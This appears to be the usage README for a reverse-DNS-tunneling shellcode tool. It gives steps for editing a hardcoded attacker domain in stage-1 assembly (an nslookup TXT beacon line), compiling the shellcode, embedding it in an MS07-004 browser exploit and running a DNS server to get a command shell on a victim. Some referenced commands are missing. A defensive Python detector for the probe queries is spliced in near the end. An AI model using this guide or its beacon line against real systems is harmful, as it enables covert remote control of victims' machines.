- stage 1 asm is currently hardcoded for tysblackhat.com; a generator program is needed so that this is dynamic
- stage 2 shellcode creates files on the victim's desktop if it dies
- issues exist for requestId numbers greater than 99
- no WSAStartup call, so it only works inside internet-connected software (where Winsock is already initialised)
- sleep is hardcoded
- GetProcAddress is hardcoded
- the server dies periodically, but no big deal since the probes continue, so you can start it back up and keep sending commands
- slow from the command line due to DNS
- backslashes aren't escaped
- shellcode is memory resident and is not persistent
- It is not a console. It is an interface to run a single command at a time.
- No environment is carried between commands
  - navigation is useless; listing directories is done in one command
  - i.e. it is useless to cd to a directory, since the next command starts at the desktop again
1. Compile asc.c for alphanumeric encoding
gcc -o asc asc.c
2. Modify hardcoded domain in reverse-dns-shellcode-stage1-v03.asm
In future versions this will be automated via a generator program like for the stage 2 shellcode.
Towards the bottom you will find the following line:
db 'nslookup -q=TXT -timeout=9 OBZG6YTF.0000-0000.0000.0001.tysblackhat.comN'
Change the domain from "tysblackhat.com" to be your domain.
This changes a couple of hardcoded values in the shellcode that need to be updated to reflect the size of your domain string. Locate the following lines and update the numbers based on the comments below:
mov [ecx + 71],dl ;71 is the length of the above db string without the "N". Update this to reflect your domain string length.
mov ecx,72 ;Here we have 72. Similarly change this but obviously add one to your value above.
mov dword [ebp-6070h],48h ;48h is the hex version of 72 ... Change your second value above to hex.
3. Compile the stage 1 shellcode
You need to have nasm, xxd and bash installed and in your path. I am using:
nasm version 2.03.01
xxd version V1.10
If you have this then run the following:
This will produce the following files and will also output some of this to STDOUT:
4. Insert the shellcode into your exploit
reverse-dns-shellcode-stage1-v03-ms07-004.html has been included just as a sample exploit that automatically gets the shellcode inserted.
5. Start the Reverse DNS Tunneling Shellcode DNS Server
I created a start script for this:
Edit this file to replace tysblackhat.com with your domain name, then run it.
This should drop you to an initial command prompt where you can enter your first command before you even send off your exploit. This ensures that no DNS probes from the victim host are wasted, since a command is ready to run immediately.
From here you basically send off your exploit and wait for the DNS Server to display "[Command Sent Over DNS]", which means it is go time!
You should now have a command prompt on your victim host tunneled over DNS.
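For the defensive side, the probe query shown in step 2 has a recognisable shape: a base32 label (OBZG6YTF decodes to "probe") followed by dotted numeric counters under the tunnel domain. The check below, an added example that is not part of this tool, scans constructed resolver log lines for TXT queries of that shape; the log line format ("client qtype qname") and the meaning of the numeric labels are assumptions.

```python
import base64
import re

# Constructed sample resolver log lines (not from the original write-up).
# Format "<client> <qtype> <qname>" is an assumption for this example.
SAMPLE_LOG = """\
10.0.0.5 TXT OBZG6YTF.0000-0000.0000.0001.tysblackhat.com
10.0.0.5 A www.example.com
10.0.0.7 TXT OBZG6YTF.0000-0000.0000.0002.tysblackhat.com
10.0.0.9 TXT _dmarc.example.org
"""

# Leftmost label is base32 (A-Z, 2-7); the next four labels are numeric
# counters in the shape of the hardcoded probe string from step 2.
PROBE_RE = re.compile(
    r"^(?P<payload>[A-Z2-7]{8,})\.(?P<seq>\d{4}-\d{4})\."
    r"(?P<a>\d{4})\.(?P<b>\d{4})\.(?P<zone>[A-Za-z0-9.-]+)$"
)


def decode_label(label: str) -> bytes:
    """Decode an unpadded base32 DNS label; raises ValueError if not base32."""
    pad = (-len(label)) % 8
    return base64.b32decode(label + "=" * pad, casefold=True)


def find_tunnel_probes(log_text: str, watched_zone: str) -> list:
    """Return TXT queries under watched_zone whose labels match the probe shape."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 3 or parts[1] != "TXT":
            continue
        m = PROBE_RE.match(parts[2])
        if not m or not m.group("zone").lower().endswith(watched_zone.lower()):
            continue
        try:
            payload = decode_label(m.group("payload"))
        except ValueError:
            continue  # not valid base32, so not this encoding scheme
        hits.append({"client": parts[0], "payload": payload,
                     "seq": m.group("seq"), "req": m.group("b")})
    return hits


if __name__ == "__main__":
    for hit in find_tunnel_probes(SAMPLE_LOG, "tysblackhat.com"):
        print(hit)
```

In practice the watched zone would be the suspicious domain observed in outbound TXT traffic; a burst of such queries from one client is the beacon loop this shellcode depends on.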
Enjoy and keep an eye out for later versions of the shellcode.